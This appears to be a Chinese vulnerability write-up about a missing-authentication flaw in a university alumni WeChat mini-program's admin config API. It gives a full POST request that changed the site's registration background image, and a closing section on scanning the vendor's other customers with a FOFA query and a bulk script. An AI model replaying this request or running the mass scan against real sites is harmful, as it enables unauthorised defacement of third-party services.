0x00 漏洞介绍

漏洞名称：**某校友会小程序存在接口未鉴权问题

漏洞等级：中危

漏洞URL：

https://asd.***.edu.cn/api/admin/config/get

漏洞信息：某校友会小程序的修改配置信息相关接口存在未鉴权问题，攻击者可使用该接口修改大量网站配置项，可造成包括但不限于挂黑页等问题。

0x01 漏洞复现

首先访问https://asd.***.edu.cn/api/admin/config/get接口，可以看到小程序详细配置信息

到此处感觉并没有泄露出什么有用信息，都是图片，！也有厂商名字，我们回头看下该接口是 /api/admin/config/get，出现了get是获取接口中的配置信息，我们试想会不会出现set来配置信息呢？不知道，试下呗！

了解了具体配置信息的参数名后，使用:

https://asd.***.edu.cn/api/admin/config/set

记得改成POST传参，Content-Type也改为json格式

然后传参内容为data

尝试修改网站配置信息。这里我尝试修改register_background这一项

可以看到这个背景和小程序注册时的背景图是一致的

该图片特征过于明显，故裁去特征

那么尝试使用set接口修改这个登录的背景图，这里我尝试把它换成清华大学主页某图片

图片URL：

https://www.xxxxxxxx.edu.cn/__local/B/76/A6/07F5A1AB187C00083464BE040ED_E2C3F45F_1AD0F1.jpg

将上边构造好数据包中将原register_background改为上述清华大学的某图片

数据包如下：

POST /api/admin/config/set HTTP/1.1

Host: asd.***.edu.cn

Sec-Ch-Ua:
"Chromium";v="103",
".Not/A)Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Windows"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53
Safari/537.36

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/json

Content-Length: 2829

{"id":1,"5dd1fc8e5403b.png",
中间数据省略。。。
"register_background":["https://www.tsinghua.edu.cn/__local/B/76/A6/07F5A1AB187C00083464BE040ED_E2C3F45F_1AD0F1.jpg"]

}

放包修改成功，这时候重新访问小程序，可以看到注册背景图成功替换：

（原图片已经改回去了，复现时使用上文的数据包即可）

0x02 漏洞危害

修改小程序上的文本、图片等配置信息，实现挂黑页的效果

恶意修改配置信息，可能导致小程序服务崩溃、宕机

0x03 修复建议：

对上述提到的接口，即

https://asd.***.edu.cn/api/admin/config/set做严格鉴权，不允许访客和普通用户使用该接口

如何进行通杀：

首先这是一款微信小程序，那么客户一般不会只有一个，前文泄露了厂商名字我们就去厂商官网找合作伙伴

接着针对他的子域名进行空间测绘收集，这里我使用的是FOFA

针对EDU某一子域名进行收集 语法：

org="China Education and Research Network Center" && host="某子域名"
一键导出之后就写脚本，拼接接口 /api/admin/config/get,这样批量跑很快就出货了。